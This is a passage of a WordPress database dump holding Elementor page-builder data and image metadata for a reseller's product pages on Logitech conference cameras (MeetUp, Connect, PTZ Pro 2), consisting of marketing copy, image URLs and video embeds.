meters), add an Expansion Mic. So whether people are seated at a table, sitting against the wall, or walking around the room, Expansion Mic for MeetUp means everyone will be heard.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7ea6e88\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a43dc18\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CERTIFIED FOR BUSINESS<\\/h4><p>MeetUp offers a plug-and-play USB connection to conference room computers, and is certified for Skype for Business and ready for Teams, Microsoft Cortana\\u00ae, Cisco Jabber\\u2122 compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo,Fuze and Zoom. If your preferred application can recognize a webcam, you can use it with MeetUp.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0264c10\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"05c50ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0569406\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>BLUETOOTH\\u00ae SPEAKERPHONE<\\/h4><p>Already connected on your smartphone? Dialing into an audio conference? Pair MeetUp with your smartphone or tablet to enjoy outstanding audio clarity, volume, and range that handheld devices can\\u2019t match.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"83af3f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8d354cd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>TAKE CONTROL<\\/h4><p>MeetUp gives you two ways to aim the camera, zoom in and out, set and recall presets, and manage volume and mute. The included remote control uses radio frequency (RF) signals for reliable and discrete control from anywhere in the room. Or, download the free Logi Remote app (available on Google Play and iTunes to control MeetUp with a smartphone or tablet.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dec4b8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8f69f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>VERSATILE TV MOUNT<\\/h4><p>Logitech TV Mount for MeetUp lets you mount the MeetUp ConferenceCam either above or below a flat-panel monitor, and attaches to the industry-standard VESA mounting points available on most TVs and monitors.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9173c99\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4e17717\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>RIGHTSENSE<\\/h4><p>Logitech RightSense\\u2122 proactive technologies make better video meetings easy and automatic.H\\u00ae RightSound optimizes the human voice and enhances conversational clarity, RightSight automatically moves the camera and adjusts the zoom so no one gets left out of the picture, and RightLight helps everyone look their best on camera, regardless of lighting conditions. With RightSense on board, video meetings are naturally more beautiful and efficient with no calibration, manual intervention or support required.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5634,2960,'_elementor_template_type','post'),(5633,2960,'_elementor_edit_mode','builder'),(5584,2952,'_elementor_edit_mode','builder'),(5585,2952,'_elementor_template_type','post'),(5586,2952,'_wp_page_template','template-fullwidth.php'),(5587,2952,'_elementor_data','[{\"id\":\"f6621d9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2da5e02\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"87f6a4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>CONNECT<\\/h2><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go<\\/p><ul><li>Superior video and audio with a compact, 76 mm footprint<\\/li><li>Works with your meeting and video conferencing applications<\\/li><li>Plug-free mobility with rechargeable battery<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"10baf7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9c4b53d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-connect-1.png\",\"id\":2942},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f84517f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"437c30b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e53080b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>FLEXIBLE VIDEO FOR THE ANYWHERE WORKPLACE<\\/h2><p>Simplify video conferencing so anyone can set it up and run a meeting anywhere. Make it affordable so you can outfit every conference room with video. Designed for huddle rooms and home offices, Logitech Connect is also compact and mobile so you can take it throughout the workplace and around the world. Connect is always ready for your next video conference call.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0b8b9cc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8894872\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"861f800\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"50ad441\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"c0fd569\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"43abcba\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-connect.jpg\",\"id\":2943}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ebc7db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c3d7d21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PERFECT FOR SMALL SPACES<\\/h3><p>Logitech Connect goes beyond its award winning design \\u2014 video conferencing so simple to use that anyone can set it up and so affordable you can enable every meeting room with video. Designed for tabletop placement and small spaces, this video conference solution offers a generous 90\\u00b0 field-of-view with pan and tilt, 4x zoom, and razor-sharp optics making it easy to see everyone in the room.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"50ce664\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"31d6359\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f8283bd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>COMPACT ALL-IN-ONE DESIGN<\\/h3><p>Take video conferencing on the go. Carry Connect from meeting to meeting, or pack it when traveling so you never miss the opportunity to meet face to face. With a tabletop footprint just 3 inches (75 mm) across, Connect fits just about anywhere. Even the handheld remote is designed for easy portability, docking as a lens cover so you won\\u2019t lose it in your bag.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4790097\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4216c7d\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/Z9jk_qlVlTY\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ee352b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ef1f433\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"90274d6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-connect-1.jpg\",\"id\":2945}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"cca09b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4e4e8a6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>COMPATIBLE WITH MOST VC APPS<\\/h3><p>Connect offers a plug-and-play USB connection to Windows and Mac computers and Chromebooks\\u2122, and is certified for Skype for Business, Cisco Jabber\\u2122 compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aadf8ee\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"dd5dc87\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f09d46b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PREMIUM CAMERA LENS<\\/h3><p>Connect features a premium glass lens for maximum clarity. Enjoy bright, clear video with accurate color rendition and sharpness, even when zoomed in. Easily protect the lens from dust and scratches by docking the magnetic remote control.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"058691e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"db09290\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-connect-2.jpg\",\"id\":2946}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fc6c046\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"77dd32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b513fa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0f8cd62\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"f1c0ab7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"2a607f9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>EASY AUDIO CONFERENCING<\\/h4><p>Dialing into an audio conference? Already connected on your smartphone? Simply pair Connect via either Bluetooth\\u00ae or NFC to enjoy outstanding audio clarity, volume, and dynamic range. Connect features two omnidirectional microphones and 360\\u00b0 wideband audio so everyone can hear and be heard.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"36e848e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f79b7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>PORTABLE POWER<\\/h4><p>Designed for convenient portability, Connect boasts an internal, rechargeable battery that can run video calls for up to 3 hours, and audio calls for up to 15 hours. Or, power Connect with the included AC power supply: swappable regional plugs (included) make it easy to to power and charge around the world.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f0e6006\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"e528c51\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>USB PLUG-AND-PLAY CONNECTIVITY<\\/h4><p>With no special software, training, or maintenance required, launching an enterprise-quality videoconference has never been easier. Simply plug Connect into your PC, Mac, or Chromebook: it works as both a webcam and an audio device with your video conferencing software.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef047c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"05d1ccf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>SAFE AND SECURE<\\/h4><p>Connect\\u2019s remote control docks over the lens, providing an extra level of privacy. And when you want Connect to stay put, the Kensington security slot offers simple protection from theft.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5588,2952,'_elementor_version','0.4'),(5590,2940,'_oembed_3cc58973ac444852859cd59cba49f525','<iframe width=\"800\" height=\"450\" src=\"https://www.youtube.com/embed/Z9jk_qlVlTY?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(5591,2940,'_oembed_time_3cc58973ac444852859cd59cba49f525','1551669377'),(5596,2953,'_elementor_version','0.4'),(5599,2954,'_edit_lock','1551680650:1'),(5600,2954,'_edit_last','1'),(5601,2954,'_wp_page_template','template-fullwidth.php'),(5602,2954,'_hide_page_title',''),(5603,2954,'_hide_header',''),(5604,2954,'_hide_footer',''),(5605,2954,'_hide_breadcrumb',''),(5606,2954,'_cover',''),(5607,2954,'_show_excerpt',''),(5608,2954,'_wc_apply_product',''),(5609,2954,'_yoast_wpseo_content_score','60'),(5610,2954,'_elementor_edit_mode','builder'),(5611,2954,'_elementor_template_type','post'),(5619,2957,'_wp_attached_file','2019/03/ptz-pro-2-camera-1.jpg'),(5620,2957,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:30:\"2019/03/ptz-pro-2-camera-1.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"ptz-pro-2-camera-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"ptz-pro-2-camera-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"ptz-pro-2-camera-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:30:\"ptz-pro-2-camera-1-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:30:\"ptz-pro-2-camera-1-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:30:\"ptz-pro-2-camera-1-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:28:\"ptz-pro-2-camera-1-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}');
INSERT INTO `wpdp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES (5625,2954,'_elementor_data','[{\"id\":\"f1634bc\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"6d9502b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"df1156a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>PTZ PRO 2<\\/h2><p>HD 1080p video camera with enhanced pan\\/tilt and zoom<\\/p><ul><li>See every detail with HD video and 10x zoom<\\/li><li>Works with your meeting and video conferencing applications<\\/li><li>Use with your existing audio system or speakerphone<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7a1160a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2991200\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ptz-pro-2-camera.png\",\"id\":1321},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11de723\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"78e614d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b75d15b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>A LEAP FORWARD IN OPTICS AND PERFORMANCE<\\/h2><p>Logitech PTZ Pro 2 delivers premium optics and life-like video to create the experience of sitting together in the same room, even if you are a thousand kilometers away. Technical improvements accent the camera\\u2019s brilliantly sharp image resolution, outstanding colour reproduction, and exceptional optical accuracy. At half the price of comparable models, PTZ Pro 2 is clearly the smart choice.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"065d405\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2b2d1c3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"370fba3\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eca227c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"e3e4388\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f238ff8\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/JEoMD9m4K1k\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"eda75f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0615e1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>CAPTURE THE ACTION IN HIGH-DEF<\\/h3><p><span style=\\\"font-size: 0.875rem;\\\">PTZ Pro 2 is the perfect fit for classrooms, auditoriums, and large meeting rooms. Capture a wide shot with a 90\\u00b0 field of view, or focus on presenters, panelists, and whiteboards with flexible pan and tilt controls. A 10x zoom lens with autofocus perfectly frames speakers and their visual aids, and delivers outstanding detail and clarity to remote participants and recording systems.<\\/span><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"56c207e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"c531900\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2682dd7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>EASY TO SET UP AND USE<\\/h3><p>USB plug-and-play connectivity makes PTZ Pro 2 a breeze to deploy and use. Simply connect PTZ Pro 2 to the conference room computer or your laptop through USB, and you\\u2019re good to go. Designed for compatibility with video conferencing applications on Windows\\u00ae and Mac\\u00ae computers, PTZ Pro 2 complements any audio system or speakerphone.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"61cfa0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"af7a3b3\",\"elType\":\"widget\",\"settings\":{\"wp_gallery\":[{\"id\":2957,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/ptz-pro-2-camera-1.jpg\"},{\"id\":2958,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/ptz-pro-2-camera.jpg\"}],\"thumbnail_size\":\"medium\",\"gallery_columns\":\"2\"},\"elements\":[],\"widgetType\":\"image-gallery\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7218c5e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3f95752\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a3ffca9\",\"elType\":\"widget\",\"settings\":{\"wp_gallery\":[{\"id\":2961,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/ptz-pro-2-camera-3.jpg\"},{\"id\":2962,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/ptz-pro-2-camera-2.jpg\"}],\"thumbnail_size\":\"medium\",\"gallery_columns\":\"2\"},\"elements\":[],\"widgetType\":\"image-gallery\"}],\"isInner\":false},{\"id\":\"bdddfd4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"94d099e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>OPERATE NEARBY OR FAR AWAY<\\/h3><p>Pan, tilt, and zoom with the hand-held remote to see everything in your conference room, auditorium, classroom, or workspace. The camera can also be operated from a remote location with downloadable software.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d11c4d2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7bfa7e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a37df32\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"77cdf52\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"ca27297\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"26cf59c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>PREMIUM CAMERA LENS<\\/h4><p>PTZ Pro 2 features a premium camera lens, designed and manufactured by Logitech. Enjoy bright, clear video with accurate color rendition and sharpness, even when zoomed in.<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7587d63\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b12d91c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>MULTIPLE MOUNTING OPTIONS<\\/h4><p>Configure the conference rooms or event space any way you want: PTZ Pro 2 includes mounting hardware for both tabletop and wall mounting, and features a standard tripod thread for additional flexibility.<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5363edd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"41471da\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>PRESET AND FORGET<\\/h4><p>Compose a wide shot so that everyone is in view. Smoothly switch between people and whiteboards. Perfectly frame each panelist for a broadcast-like experience. PTZ Pro 2 features three camera presets that save pan, tilt, and zoom settings, and smoothly transitions between them at the touch of a button.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b674c12\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"e7fd0e2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CERTIFIED FOR BUSINESS<\\/h4><p>PTZ Pro 2 offers a plug-and-play USB connection to conference room computers. The camera is certified for Skype for Business, is Cisco WebEx compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom. If your preferred application can recognize a webcam, you can use it with PTZ Pro 2.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"55c02fd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"fc64e71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b432be1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"3\\\"]<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5621,2958,'_wp_attached_file','2019/03/ptz-pro-2-camera.jpg'),(5622,2958,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:28:\"2019/03/ptz-pro-2-camera.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"ptz-pro-2-camera-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"ptz-pro-2-camera-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"ptz-pro-2-camera-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:28:\"ptz-pro-2-camera-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:28:\"ptz-pro-2-camera-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:28:\"ptz-pro-2-camera-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:26:\"ptz-pro-2-camera-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5623,2957,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:14.289484100804855870592291466891765594482421875;s:5:\"bytes\";i:7581;s:11:\"size_before\";i:53053;s:10:\"size_after\";i:45472;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:345;s:11:\"size_before\";i:3709;s:10:\"size_after\";i:3364;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.9399999999999995026200849679298698902130126953125;s:5:\"bytes\";i:551;s:11:\"size_before\";i:4614;s:10:\"size_after\";i:4063;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:2683;s:11:\"size_before\";i:16560;s:10:\"size_after\";i:13877;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.03999999999999914734871708787977695465087890625;s:5:\"bytes\";i:529;s:11:\"size_before\";i:4395;s:10:\"size_after\";i:3866;s:4:\"time\";d:0.010000000000000000208166817117216851329430